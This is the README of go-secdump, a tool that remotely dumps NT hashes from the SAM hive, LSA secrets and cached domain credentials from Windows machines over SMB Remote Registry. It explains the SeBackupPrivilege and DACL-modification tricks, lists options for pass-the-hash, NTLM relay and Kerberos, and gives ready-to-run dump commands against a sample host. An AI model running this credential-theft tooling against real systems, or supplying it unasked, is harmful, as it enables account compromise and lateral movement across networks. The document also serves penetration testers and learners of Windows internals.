
Tool to remotely dump secrets from the Windows registry
Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.
The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.
It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.
The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.
However, a better approach was discovered (February 2025) by Julien Egloff over at Synacktiv. The BaseRegOpenKey request used to open handles to registry keys has an option to assert the SeBackupPrivilege which allows us to open the registry keys without first changing the DACLs. The tool has been updated to prefer this new approach and only change the DACLs if asked nicely.
Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.
Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:
https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
http://www.beginningtoseethelight.org/ntsecurity/index.htm
The idea to use SeBackupPrivilege came from Synacktiv: https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump
Usage: ./go-secdump [options]
options:
--host <target> Hostname or ip address of remote server. Must be hostname when using Kerberos
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
-k, --kerberos Use Kerberos authentication. (KRB5CCNAME will be checked on Linux)
--dc-ip <ip> Optionally specify ip of KDC when using Kerberos authentication
--target-ip <ip> Optionally specify ip of target when using Kerberos authentication
--aes-key <hex> Use a hex encoded AES128/256 key for Kerberos authentication
--keytab-file <file> Authenticate using keys from a keytab file (implies -k). User and
domain are taken from the first keytab entry if not specified
--dns-host <ip[:port]> Override system's default DNS resolver
--dns-tcp Force DNS lookups over TCP. Default true when using --socks-host
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only other explicit targets are included.
--misc Extract misc registry secrets such as the Winlogon
DefaultPassword explicitly. Only other explicit targets are included.
--modify-dacl Change DACLs of reg keys before dump.
Only required if keys cannot be opened using SeBackupPrivilege. (default false)
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file <file> Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout <duration> Dial timeout in format 5s or 2m (default 5s)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging. Bare --debug turns on every
registered package; --debug=msrrp,smb turns on only the
listed package-name suffixes (the '=' form is required
for the filter).
--verbose Enable verbose logging. Same filter syntax as --debug.
--debug and --verbose may be combined with different
filters; a package targeted by both gets the higher level.
--list-log-packages List the registered log package names that can be
targeted with --debug=<suffix> or --verbose=<suffix>,
then exit
-o, --output <file> Filename for writing results (default is stdout). Will append to file if it exists.
--output-format <fmt> Output format: text (default), json, or hashcat
--history Include historical (OldVal) LSA secrets in addition to current values
-q, --quiet Suppress informational headers; print only secrets
-v, --version Show version
Now only as an optional feature enabled with --modify-dacl,
go-secdump will automatically try to modify and then restore the DACLs of the
required registry keys. However, if something goes wrong during the restoration
part such as a network disconnect or other interrupt, the remote registry will
be left with the modified DACLs.
Using the --backup-dacl argument it is possible to store a serialized copy of
the original DACLs before modification.
If a connectivity problem occurs, the DACLs can later be restored from file
using the --restore-dacl argument.
Dump all registry secrets using the SeBackupPrivilege trick
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
Dump only SAM, LSA, DCC2 cache, or misc registry secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --misc
The --misc target extracts miscellaneous registry secrets that don't belong to
the SAM/LSA/DCC2 hives, currently the Winlogon auto-logon DefaultPassword (and
the associated DefaultUserName) when present.